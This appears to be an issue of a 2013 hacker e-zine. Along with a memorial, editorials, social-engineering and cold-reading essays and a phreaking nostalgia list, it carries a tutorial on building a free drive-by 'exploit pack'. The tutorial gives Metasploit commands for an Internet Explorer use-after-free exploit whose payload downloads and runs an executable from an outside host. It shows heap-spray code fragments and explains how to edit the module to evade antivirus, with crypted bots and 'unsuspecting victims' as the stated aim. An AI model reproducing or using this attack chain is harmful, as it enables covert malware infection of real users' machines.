South West Anarchy Team presents...
_.--""--._ _.--""--._
/ _ _ \ ###### ## ## ### ######## / _ _ \
_ ( (_\ /_) ) _ ## ## ## ## ## ## ## ## _ ( (_\ /_) ) _
{ \._\ /\ /_./ } ## ## ## ## ## ## ## { \._\ /\ /_./ }
/_"=-.}______{.-="_\ ###### ## ## ## ## ## ## /_"=-.}______{.-="_\
_ _.=("""")=._ _ ## ## ## ## ######### ## _ _.=("""")=._ _
(_'"_.-"`~~`"-._"'_) ## ## ## ## ## ## ## ## (_'"_.-"`~~`"-._"'_)
{_" "_} ###### ### ### ## ## ## {_" "_}
## ## ### ###### ### ######## #### ## ## ########
### ### ## ## ## ## ## ## ## ## ### ## ##
#### #### ## ## ## ## ## ## ## #### ## ##
## ### ## ## ## ## #### ## ## ## ## ## ## ## ######
## ## ######### ## ## ######### ## ## ## #### ##
## ## ## ## ## ## ## ## ## ## ## ### ##
## ## ## ## ###### ## ## ######## #### ## ## ########
\------------------------------------------------------------------------------/
ISSUE 42 - JUNE 2013
/------------------------------------------------------------------------------\
/--------------------------------------------\
| |
|"Do not meddle in the affairs of dragons, |
| for you are crunchy and good with ketchup" |
| |
|--------------------------------------------|
| Unknown |
\--------------------------------------------/
http://www.swateam.org
http://www.swateam.org.uk
firestarter@swateam.org.uk
12 years since the last release!!!!! Bloody hell how things have changed,
although I'm glad to say that the site has remained online. I did lose the old
.org domain but then after many, many years I finally got it back. So we now
squat at .org.uk and .org domains.
It's not to say that articles haven't been released during that time, although
not many, and there are more articles written and not released forever remaining
unfinished sat on a hard drive somewhere. But we're back, kinda.
Given this is the first magazine release in over a decade and the world has
changed, changed a lot and I don't want to wake up with an MP5 stuck in
my face, I'm sad to say that there won't be any more of the fun, dangerous,
absurd and downright entertaining articles on making explosives using nothing
more than a couple of ink cartridges and several boxes of matches.
Sad, I know but after all that terrorism bollocks over the years MI5 don't seem
to enjoy such things being released any more. But as you should all know you can
still find the old works on the site in the good ol' fashioned SWAT b00k!!
So, instead of sticking bomb making articles in there I figured that I'd turn
my hand to articles about survival and bushcraft. At least building traps and
other assorted survival goodies won't get me locked up, well it depends how big
I build them but you get the idea.
Anyhow, without further ado....
+------------------------------------------------------------------------------+
| Contents |
+---+--------------------------------------------------------------------------+
| # |Article title +++++++++++++++++++++++++++++++++++++++++++++ Author +++++++|
+---+--------------------------------------------------------------------------+
|00:|Introduction......................................... -=The Firestarter=- |
|01:|Mj - Our Friend...................................... -=The Firestarter=- |
|02:|First Thoughts.............................. Brakis & -=The Firestarter=- |
|03:|The Soft Touch of Social Engineering........................ Brakis |
|04:|Why You Are Important ...................................... Brakis |
|05:|Metasploit Exploit Pack.............................. -=The Firestarter=- |
|06:|The Art of Cold Reading..................................... Brakis |
|07:|You Were a Phreaker if you.................................. Brakis |
|08:|Rambles and Rants - Social Herding.......................... Briar |
|09:|Proactive Server Defence............................. -=The Firestarter=- |
|10:|Three Shades of Green, and The Viridian Design Movement .. -=The-Doh-Boy=-|
|11:|Fiction: Burnt by Burner.................................... davethefan |
|12:|Cover Yourself From Prism............................ -=The Firestarter=- |
|13:|Services and Daemons ................................ -=The Firestarter=- |
|14:|SWAT Magazine Info........................................................|
|15:|Wrap up and Disclaimer....................................................|
+---+--------------------------------------------------------------------------+
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| Mj - Our Friend by -=The Firestarter=- |
+------------------------------------------------------------------------------+
It was May 3rd at 16:20 when Phreazoid got in touch with me and a few of the
others, it was to share the sad news that our old comrade and long time friend
Mj had passed away.
I have to say the news hit me hard, Mj was a good friend that I'd known for
years, back in SWAT's hey-day when we were at our peak and APT/Krash Magazine
were in the scene with us (Mj, Ody, Chicane, Exegency).
While it had been a while since I had spoken to Mj, he was always a familiar
friend that I could catch on IRC and chat to.
Over the years of meeting people in the scene chatting to them, bouncing ideas
around or just having a laugh I don't think you realise just how much the bond
between people and groups grow.
Here I was with this news that we'd lost one of our own, chatting with people
that I'd known for years albeit maybe not spoken to most of them for a very long
time, we were all as shocked as each other, the small community that we were
was still alive, and feeling the loss.
Then the conversations turned to the good old days, of people we knew and who
was in touch with who, so we could get the word out etc.
Hearing that you've lost a friend that was once part of your day to day life
isn't a good thing, but it does make you reflect on what you have now in your
life as well as looking back at the good times you shared.
Here we were, a group of people that hadn't spoken or seen much of each other
for a time, now all brought together under such tragic circumstances.
Mj will be missed, each and every one of us that knew him held respect for the
guy, a genuine hacker, he had knowledge, he helped people, he shared things.
He was person too, and a good one, while I never knew him outside of the
h/p scene many of the others did and the condolences for Mj, that many
have shared, are moving.
I must be honest I was very moved myself by the news and it was decided that in
his memory we would release commemorative issues of the old zines. So we got
the old crew together and decided to restart SWAT Magazine.
Mj, my friend, you will be missed dearly, your untimely and premature passing
has brought home just how mortal we all are, and that we should live our lives
to their fullest, as after all one day we must all pass on.
Mj I hope you knew just how popular you were with us all and I am proud to
say that I dedicate this, our best ever issue of SWAT Magazine to you.
You will never be forgotten and you will always be in our hearts and minds.
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| First Thoughts |
+------------------------------------------------------------------------------+
The last time Swat released an issue, which was in November 2001, the world
was a very different place. Britain had a Labour government, you could be a
terrorist and not be Muslim, you could buy a pint of beer for under £2.00, we
were all excited about the turn of the millennium and the future seemed so full
of promise. You could get a credit card, loan or mortgage with very little to no
income. Drugs were more dangerous than legal highs, not the other way around.
The phone in my pocket now packs 5 times more computing power than was in my
beige desktop which ran Mandrake Linux and Windows 2000. The heady days of
prepay phones and dodgy guys in sheds chipping philips digas to get unlimited
calls.
Blah blah fucking blah........nobody gives a fuck, the important thing is that
after more years and failed attempts to get the ball rolling than we care to
count we have finally got our shit together and brought back the awesome mag
that was loved by so many back in the “oldsk00l” dayz. Don't worry though this
won't be like Star Wars where the latest installments are a lot of shite. This
zine is continuing where it left off only now we have a twelve year backlog of
accumulated knowledge to share with the masses. It was always our purpose to
publish any information to anyone in the spirit of freedom of the individual
and support your right to not let anyone else, apart from yourself, make
decisions for you. So in that spirit we bring you something we have all
(including those who wrote it) waited a long time for.
Boyz and Gurlz...Layd33z and G3n7lem3n
We iz proud to present SW4T 42
Luv Hugz and a big ol’ fuckin :D
Firestarter and Br4kis
(Who in the past 12 years have started a successful online florist based in
Devonshire, for that special occasion please visit www.yomamaspwettyflower.com)
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| The Soft Touch of Social Engineering By Brakis |
+------------------------------------------------------------------------------+
This article is written in memory of MJ who's tragic and untimely passing is a
great loss to the Hacking community. Obviously to those that knew him personally
(who's number I cannot count myself amongst) his presence will be most painfully
missed. In tragedy there can often be some hope; as in the case of the feuding
or apathetic family who are brought out of hiding by a sudden bereavement, so is
the case with this community who in memory of a beloved friend feel it is time
to remind the world of what he and they did. The things we were interested in
and the values that we held.
It is in this spirit I would like to submit for your entertainment and
nostalgia...
The Soft Touch of Social Engineering By Brakis.
Social Engineering or human hacking has been around since humans first evolved
to communicate linguistically with each other and as such it is something that
you will have done either consciously or unconsciously at some point today.
Let me give you some examples of some subtle Social Engineering I have
undertaken today without thinking:
I threw a cat toy out of my bedroom so that the cat would chase it out, I didn't
want to play with her I just wanted her out of my bedroom.
The guy in Starfucks asked me how I was today, I told him I was well, I then
reciprocated by asking him how he was. The two of us couldn't give a shit about
how the other was. We have just become so familiar that we feel the need to
take part in an arbitrary conversation which really serves no purpose.
A colleague asked me what I did last night. My answer was simple and mundane,
not because I was doing anything secretive or subversive but the thing I was
actually doing was either so complicated and idiosyncratic or outside what we
call the norms of socially acceptable conversation that it wasn't worth my time
to explain the context which led to me undertaking the previous evening's
venture.
Consider the following:
Conversation 1 -with SRSE (subtle and routine social engineering)
Colleague: "What did you do last night mate?"
Brakis: "Ah fuck all mate, I watched family guy and had a pretty early night.
What about you?"
Colleague: "I just chilled out with the Mrs"
Brakis: "Cool"
Conversation 2 -Without SRSE
Colleague "What did you do last night mate?"
Brakis "Well I got home, planned to masturbate. I couldn't find a suitable whack
off video on pornhub because I have desensitized myself to porn over the last
fifteen or so years and I have pretty much killed my internal fantasy mechanism
and I actually find most porn pretty boring but I still compulsively watch it
because I can't undo that little bit of internal programming. Due to the fact
that I skipped lunch and was starving I ended up going to the take away and
getting a huge kebab which I later felt guilty about so I ended up doing hand
stand push ups against the wall in a tokenistic attempt to undo the damage from
the kebab. I felt pretty good after ten so I figured I would reward myself with
a wank so then I had the same problem which I had the first time. I then had a
successful wank to a tried and tested video on pornhub which made me wonder if I
have a more meaningful relationship with the woman in the video than with the
woman I am actually with. I decided I was over thinking so I spent most of the
rest of the evening trying to recompile my OS kernel so that the necessary
non-proprietary drivers for my wireless card would work, this makes me guilty
because I know that I really should be using free software for everything. I
also watched 3 episodes of Babylon 5 which I had seen countless times before...
also if you make a comment about hating Sci Fi then I will hate you forever.
I read a bit of a book that is too big and I think might make me smarter and
then went to bed. What about you mate?".....
You get the idea. In the 2nd example there is no deception, not by omission or
misinformation. This has a number of disadvantages. One being the
huge waste of time and productivity lost by such a conversation, never mind the
discomfort of such a conversation. The advantage of the 1st being that it
maintains the social fabric that we social engineers and human hackers can take
advantage of when the need or motivation arises.
Everyone wears a face which is on display all the time. It is a fusion of our
physical presence, our sense of self image and self esteem, how we perceive
ourselves in relation to others. It would be logical to surmise that this is an
innate or automatic reaction. Necessary both as a defence mechanism and as
utility for attraction (think about when you are the trying to
attract the opposite sex).
Being mindful of these subtleties and inate abilities serves two core purposes
which are useful to the would be social engineer.
The first of these is that it makes you more aware of your own internal
dialogues and the noise that is in your head. Part of the fact is that a great
deal of our innate deception extends to ourselves as well. Yes, believe it or
not you lie to yourself! Again some of these are useful and some are not. This
in turn serves to make you better at social engineering as you are able to be
more tuned in to the little deceptions which ultimately make us better at what
we do.
The good social engineer must be aware of this, the subte social engineering,
which makes up the fabric of most of our communication. Take for instance the
following example.
In 2005 myself and an associate had been contracted by a technology start up in
europe to test their human infrastucture against social engineers, information
gatherers and the like. It became apparent to us that the scale of what was
required meant we would have to use extra help. We had a number of candidates
that were sought through both informal and formal contacts. One candidate
claimed to be a professional gambler who had a very effective track record in a
sales company. Sure enough his references and contacts seemed to stack up, he
had an interest in computers and wanted to get some experience of social
engineering (as part of the process we even went on a trip with him to the
casino so we could see his gambling success).
In the end we didn't take him on for this particular project because there was
something missing.
The thing that was missing was mindfulness of the subtleties of the
communication and that innate deception which continually takes place. He was a
successful sales man because he had learned patterns and ways of talking to
people which gained results. He was a successful gambler because he had learned
techniques which improved his odds and he had convinced himself that he was a
successful gambler. As is the case with most gambling the odds over the long run
could be read either positively or negatively. Due to the fact that he was not
aware of the organic way people communicate then he would find it more difficult
to think on his feet and in the case of this contract prove to be an ineffective
tester or perhaps even a liability. Patterns, techniques are highly useful and
can be very effective but they have a limit to what they can do and a more
intrinsic understanding is necessary. Simply to be a good social engineer it is
always more effective to pay attention to the minutiae of human communication
as it allows your innate abilities and awareness to increase. Thus making you
naturally better. Intuition can be fed!
The second core purpose is (perhaps in contrast to the first) the development of
micro-techniques that make you more effective when approaching your projects and
showing others how to do the same. At this point you might be asking "Hey Hey!!!
Mr Brakis Dude....you just told us that we want to gain an understanding of
innate communication and the subtleties of communication and avoid techniques
and patterns." Yes I did. The distinction between what you are trying to gain
and what our friend the gambling salesman has is that your techniques will be
unique to you and rooted in the underlying nature of communication. Not some
hackneyed technique from a book that may work 60% of the time but fails to take
into account that people are individuals with entirely different perceptions.
With this in mind I would like to invite you try and be more mindful of the
small things about your communication. Try and keep a mental log of all the
little ways in which you are dishonest or lie by omission. Once you have done
that, figure out what the reason was. This will start you on the path to
becoming a more skilled, natural and intuitive social engineer.
Hack the human, hack the system.
Brakis 2013
All text contained within this article is intended solely for information and
entertainment purposes. Any legal action or prosecution which results from
anything taken from the article is entirely the responsibility of the reader and
the author takes no responsibility for any legal action, injury or death which
happens as a result of the actions of the reader. This disclaimer applies to all
aritcles, information and consultation provided by the author. This article
remains the intellectual property of the author. It may be redistributed freely
provided that the article remains intact and all credits, disclaimers and
copyright notices remain attached to the article.
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| Why You Are Important By Brakis |
+------------------------------------------------------------------------------+
Why you are important.
I imagine if you are reading this then you are somebody who in some shape or
form attaches yourself to something that society perhaps looks down upon or
is threatened by.
You my friend, brother or sister are exactly what the world needs. Years ago my
friends and I explored computers and phone systems to gain an understanding of
what it is people didn’t want us to understand.
This is particularly poignant at this moment in time as the world is being
turned up on its head by revelations that privacy is a thing of the past and
that pretty much everything we say or do is being watched. I don’t think
personally this is that much of a surprise to anyone but I think that as our
liberty dies we are too complacent in doing nothing about it.
John Stewart Mill in his book 'On Liberty' talks a lot about how a healthy
society needs individuals to be innovative to develop, to allow for new ideas to
take hold and for people to grow and become better.
Think of all the positive things we have done and developed in the last twenty
years. We have the ability to communicate with people all over the world with
very little effort, we have unparalleled access to information. We have new
cooperative initiatives from people who genuinely want to make the world a
better place.
You are important because without people like you, people who strive, people who
love, people who know that we as a species deserve the world we want to live in.
Without people like you that change will never come. We will be dominated by
those who seek to keep the majority down, to keep everyone quiet to keep good
ideas out of the public eye.
You might be reading this and thinking “No way man. I’m not important! I am just
a.....” Well fuck that, you are important. You just don’t know how powerful you
are yet. You have done and will do great things which will come from a place of
genuine excitement and compassion and those that seek to keep you down either
because they are scared of what you can do, or because you remind them of what
they have not been brave enough to do themselves will be left behind in your
dust.
Ideas which make the world a better and more equal place come along like buses
(there is none for a while but then they all come at once). You have to step out
and be brave and graciously accept the experiences which have been given to you.
You are important because you are that individual that makes society innovative
which makes society better. Those brave, stupid, crazy ideas you have are what
is going to save us.....and the best part is you can’t do it alone....you need
the rest of us to make it work too.
Much love brothers and sisters.
Brakis.
All text contained within this article is intended solely for information and
entertainment purposes. Any legal action or prosecution which results from
anything taken from the article is entirely the responsibility of the reader and
the author takes no responsibility for any legal action, injury or death which
happens as a result of the actions of the reader. This disclaimer applies to all
aritcles, information and consultation provided by the author. This article
remains the intellectual property of the author. It may be redistributed freely
provided that the article remains intact and all credits, disclaimers and
copyright notices remain attached to the article.
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| Metasploit Exploit Pack... By -=The Firestarter=- |
+------------------------------------------------------------------------------+
Exploit packs are bits of kit sold on the blackmarket with one intention:
installing malware on unsuspecting victims using a variety of exploits - usually
utilised via the web browser.
They sell for thousands, well some do, some for a few hundred, and some for just
a few quid (although they are mostly very expensive).
Now as much as I'd love to wire a few grand over to some random Russian that
I've never met in order to get the latest and most evil piece of drive-by
installing software out there today, I am a bit of a cheapskate when it comes
to paying for things I can do myself.
Now I've several exploit packs in my possession, mostly downloaded from the far
flung corners of the internet, all of them pretty much outdated and likely to
fail on all but the least updated boxes that have the misfortune to be
connected to the internet.
The best exploit packs out there are very sophisticated in the ways that they
work, that is they will use javascript to analyse the browser that has opened
the landing page - which is usually linked in from an innocent page on a
cracked server via an iframe.
It will look at what versions of flash are installed, what versions of java,
the operating system type, browser type, IP address etc.
All of this information will now get stored in an SQL database and the pack
will then attempt to exploit the system.
The more sophisticated kits will see what versions of flash, java, etc are
installed and fire off exploits that are known to work on them, this method
has proven to be far more successful at exploiting machines than just firing
off everything the kit has onboard.
Given that exploit packs usually come with a handful of exploits, mainly
targeting things such as flash, java, adobe acrobat and the browser itself
and given the resources that the attack server has on board, it can be
quicker to get one or two exploits in rather than trying to shove every known
attack vector down the internet and onto some poor sod's machine.
Thus, if the pack sees you have a crappy never been updated since 2010 version
of flash player, it will fire off one of many exploits and get some shell code
injected in there, your machine will then proceed to download some executable
file from the server and run it.
Hey presto you're now part of someone's botnet :)
All very clever, you will now also be a statistic on the exploit packs web panel
showing how many machines have been hit, how many exploited and where you're
from (country) etc etc.
But if we're wanting to save a bundle of cash and we're prepared to do without
the web panel and statistics - I mean lets face it, bots in the net are more
than enough of a statistic than what some exploit pack reports, then we can
utilise our favorite exploit framework and the trusty old eee pc to create
an adequate and updateable totally free of charge malware loading device. Yes
you too can be an evil genius with nothing more than time and a computer.
Ok, so how are we going to go about achieving this goal?
First off we are going to need a payload, for testing purposes we'll assume
that I want to load our latest version of Satanic Hoard (our testing bot we
coded in vb6 using elite ninja skills), however like all great skid tools
it's detected by every anti-virus under the sun, thus we will run it through
one of our crypters and take the detection from 35/35 to 0/35. Yep, we are
now fully undetected (FUD), so all those noobs with out of date machines
running (their probably out of date) anti-virus software will have a nice
false sense of security when we hijack their machines for evil purposes.
The next and more important step, actually probably more important than the
payload is the exploit, metasploit comes with a whole host of wonderful methods
in which to take ownership of unsuspecting machines, some are more relevent to
our cause than others, and the great thing about metasploit is its ability to
update itself to the latest and greatest exploits out there.
For this exercise I am going to make use of the awesome, and at time of writing
newest Microsoft Internet Explorer CGenericElement Object Use-After-Free
Vulnerability, CVE 2013-1347 . But you can browse exploit-db.com and find your
own latest and most awesome pentesting codez, or be really elite and write your
own - but that's another article for another time.
Anyhow, let's get things going.
First off, let's start metaspoit:
./msfconsole
Now we set the exploit to be used:
msf > use exploit/windows/browser/ie_cgenericelement_uaf
Now we set the payload:
msf exploit(ie_cgenericelement_uaf) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
Let's configure the payload:
msf exploit(ie_cgenericelement_uaf) > set URL http://www.swateam.org/a.exe
URL => http://www.swateam.org/a.exe
Set what the dropped file name on the target is:
msf exploit(ie_cgenericelement_uaf) > set EXE adobe.exe
EXE => adobe.exe
Now run it as a background job:
msf exploit(ie_cgenericelement_uaf) > exploit -j
[*] Exploit running as background job.
Ok let's test it out, we browse to the target URL and what do we get...
[*] Using URL: http://0.0.0.0:8080/2v8xriE8VXZsONY
[*] Local IP: http://192.168.1.10:8080/2v8xriE8VXZsONY
[*] Server started.
msf exploit(ie_cgenericelement_uaf) > [*] 192.168.1.4 ie_cgenericelement_uaf - Requesting: /2v8xriE8VXZsONY
[*] 192.168.1.4 ie_cgenericelement_uaf - Requesting: /2v8xriE8VXZsONY
[*] 192.168.1.4 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.1.4 ie_cgenericelement_uaf - Sending HTML...
Ok, looks good on the attack side of things, but what happens with the target
side of things?
Well, AVG goes mental and starts crying about a virus!!! Oh no it's detected
the exploits evil attempts to lay down the pwn on windoze, we can't be having
that interfering with our attempts of world domination.
First step, let's find out what's tripping things, let's go to the web cache and
acquire the webpage that tripped the alert and save the contents to a text
file.
Now let's look through the code and see what could have caused the problems. To
check this over what we're going to do is create a new .html file, we'll call
it test1.html and we're going to paste in a block of text at a time, save it
and scan it to find out what's causing the issues.
let's begin at the top...
We'll enter the first dozen or so lines into it:
function mstime_malloc(oArg) {
shellcode = oArg.shellcode;
offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize;
objId = oArg.objId;
Look dodgy don't they? Paste, save and scan.
Nothing found, ok let's move on and we'll add the next dozen or so lines into
it. Those bits that look like:
e = document.getElementById(objId);
if (e == null) {
eleId = "ZXBvS"
acTag = ""
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}
function helloWorld()
{
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
They come before that nasty looking block of code. Paste, save and scan.
Still nothing!?!?!?!
Ok we'll paste in the HUGE block of unescape code, that's gotta be bad ass and
nasty.
Still nothing! OMG am I doing it right? Now let's add the information just below
that block of code, all those f0 = document.createElement sections, now save
and scan.
Bingo, evil virus detected!!! - I'd paste the code, but I remember when we
released the iloveyouvirus and we had a fuckload of lamers complaining that we'd
infected the txt documents with virii and were trying to infect people. Fuckin'
noobs.
Anyhow, now we've located the section of code thats tripped the scanner, so what
we need to do is change it a little so that our exploit slips past and allows us
to infect the target box.
So what we now need to do is locate the exact part of the code that's making AVG
throw a hissy fit.
For this we create a document and paste ONE line at a time of the offending
block, save and scan, slowly, line by line building up the offending block.
What do we notice? We notice the line that says "collectgarbage" trips things
so we test this by putting JUST that line in a file, save and scan, nothing, we
try it with the rest, it sets it off.
So now we'll paste the remaining block of text into the file, BUT remove the
trigger line, save and scan, nothing found.
So we know we have to change that line, or at the very least the parts around
it.
Since the collectgarbage is actually a part of javascript itself we can't just
rename it along with whatever calls it, so we shall try some k-rad codez to
make it appear slightly different.
What shall we do? We'll try add a comment on the line above it.
//test//
Save and scan. Nothing found! Perfect, so now all we need to do is alter the
main module in metasploit to ensure we always have a FUD attack to carry out
on poor unsuspecting victims.
So we go:
cd /opt/metasploit-framework/modules/exploits/windows/browser/
nano ie_cgenericelement_uaf.rb
Scroll down to the offending line (264) and add in the comment and save.
You can do this to several of the top exploits, and get each one running in its
own directory, then simply open up an iframe to them. If the browser hitting
the sites doesn't carry the correct version etc then metasploit will return with
a 4o4, or at least it does with the ie_cgenericelement_uaf exploit.
This simple strategy will work with many many exploits, it also shows just how
easy it is to rip them from metasploit for your own evil means.
If you wish to add more exploits simply repeat the above steps until you have
half a dozen or so exploits running away in the background on various URLs and
either have them opened all via iframes on a page or if you feel really special
then whack up some javascript to fire victims at the relevent exploits. The
world is your oyster!
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| The Art of Cold Reading by Brakis. |
+------------------------------------------------------------------------------+
Has there ever been a time when you as a natural skeptic have looked at someone
and thought that they had an above average awareness of what was going on around
them? Perhaps someone who appears to grasp things that you do not or perhaps has
a deeper understanding of people.
Perhaps you have seen a psychic and been amazed by the level of accuracy of the
predictions they are able to draw out of thin air. In spite of knowing in your
heart of hearts that there are no such things as psychics.
This is true for soothsayers, psychics and any other jack ass who claims to be
able to see into the future.
There is a couple of techniques which I will discuss here that will give you
some idea of how cold reading can be applied. I will also give you a skeleton
outline of how these techniques can be used in any setting.
Essential to the understanding of cold reading is ability to realise that people
are essentially patterned creatures and although you should never make too many
assumptions about anyone. When cold reading (or attempting to ascertain if
someone is cold reading) then a fairly healthy dose of common sense must
prevail.
Let me give you a fairly standard example. If you think of a psychic medium, who
is able to talk to the dead, what this person will be doing is finding a
willing volunteer (it is safe to assume that people that have
paid to sit in a room and listen to somebody that talks to ghosts in fact have
the desire themselves to get in touch with someone who has died).
The medium will then proceed to use a technique called shot gunning (this
doesn’t mean cutting the audience down with a sawn off). This involves using a
series of probability guesses until someone in the audience responds.
M is for Medium, A plus a number refers to an audience member. The commentary in
brackets is my commentary.
M: I am sensing something coming through....someone.....oh it’s a female who’s
name begins with an M or an S?
A1: Oooh yes.
M: You knew a woman who’s name begins with an M (how many fucking woman are
there with a name that begins with the letter M)
A1: Yes, my mother, Margaret (so now the stupid bitch has just told the medium
everything he needs to know and the amount of supposedly correct guesses this
guy can make will quickly get the woman's hopes up and probably empty her
pockets too).
There are a number of assumptions that you can make about A1 such as her mother
has died....her relationship with her mother had some quirk for example they
used to be close but something happened, A1 wasn’t there for the death of her
mother, there was something she wanted to tell her but didn’t have the chance.
It is also easy to make assumptions based on the kind of woman that A1 is (she
may also be man) and many of the things that cannot be ascertained by her
appearance or actions can be guessed at with a binary fifty fifty guess.
Link this with the fact that the audience members are looking for answers and
you have a perfect set up.
Cold reading can be used in a number of different situations. To become super
elite at cold reading you have to start to notice peoples little tells (like in
poker) people give away so much from how they walk and how they act and the
things they say in jest. Cold reading as with all aspects of social engineering
can seem somewhat daunting at first. The trouble I find when getting deep into
social engineering techniques is that I worry I will over think what I am doing
and lose sight of what my objective is. My advice is to relax and not stress too
much about figuring everything all out at once. You can start small and as long
as you keep certain principals in mind then you will be able to get a better
reading as you practice. You are human and the subject you are trying to cold
read will be human so trust that you will get a better understanding as time
goes on. To an extent it becomes second nature. It becomes innate and before you
know it, you can get an accurate read on people before they have even said a
word.
As for the ethics of cold reading. As I have demonstrated it can be used for
fraud however do not be too hard on the poor medium because some of these poor
dolts actually think they can speak to the dead and no have idea what they are
actually doing is cold reading. It is always important to stay cautious when
dealing with anyone for the first time. So let cold reading be your ally.
Brakis 2013
All text contained within this article is intended solely for information and
entertainment purposes. Any legal action or prosecution which results from
anything taken from the article is entirely the responsibility of the reader and
the author takes no responsibility for any legal action, injury or death which
happens as a result of the actions of the reader. This disclaimer applies to all
aritcles, information and consultation provided by the author. This article
remains the intellectual property of the author. It may be redistributed freely
provided that the article remains intact and all credits, disclaimers and
copyright notices remain attached to the article.
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| You Were a Phreaker if you... By Brakis |
+------------------------------------------------------------------------------+
Unfortunately it is very sad to admit brothers and sisters but our phreaking
hay day has past. The days of scanning 080089xxxx to find a voice mail box or a
teleconferencing service are sadly behind us.
Public phone boxes have been replaced with mobile phones, outdials have been
replaced by google hangout. Never mind fucking compuserve...
With this in mind I would like to present you with a list of things that you may
or may not have done which might remind you of the days of when you were a
Phreaker or some such nonsense.
You were a phreaker if you....
Had a long distance relationship with someone or something you had never even
seen a picture of,
got a hard on from a dial tone,
tried blue boxing pissed by whistling the 2600 tone down a pay phone,
ran from a phone box that a dial 100 operator was monitoring,
done everything dodgy in a phone box except from have sex, take drugs or
actually anything cool,
be a little bit smug in the knowledge that the guy that bullied you at school
could be taken down by your elite phone hacking skills,
were in darkcyde,
were out of darkcyde,
got into a feud with darkcyde,
loved darkcyde,
hated darkcyde,
created a beige box,
know why this article refers to colored boxes,
mourn the loss of phone boxes,
try undertaking a bizarre experiment with a phone box in a Taipai car park after
one too many (this might just be me),
you installed bluebox tone generator on your DOS system,
you loved BBS
viewed BT vans with a strong degree of suspicion, perhaps going as far as to
call them the gestapo,
spent countless hours speaking to people you will never see in your real life,
invented a new box colour in your dreams,
feel incredibly proud that you were part of something genuinely different and
unique,
had a red sore on your ear from pushing the phone receiver to close,
smelled like phone box,
didn’t mind the smell of piss from a phone box,
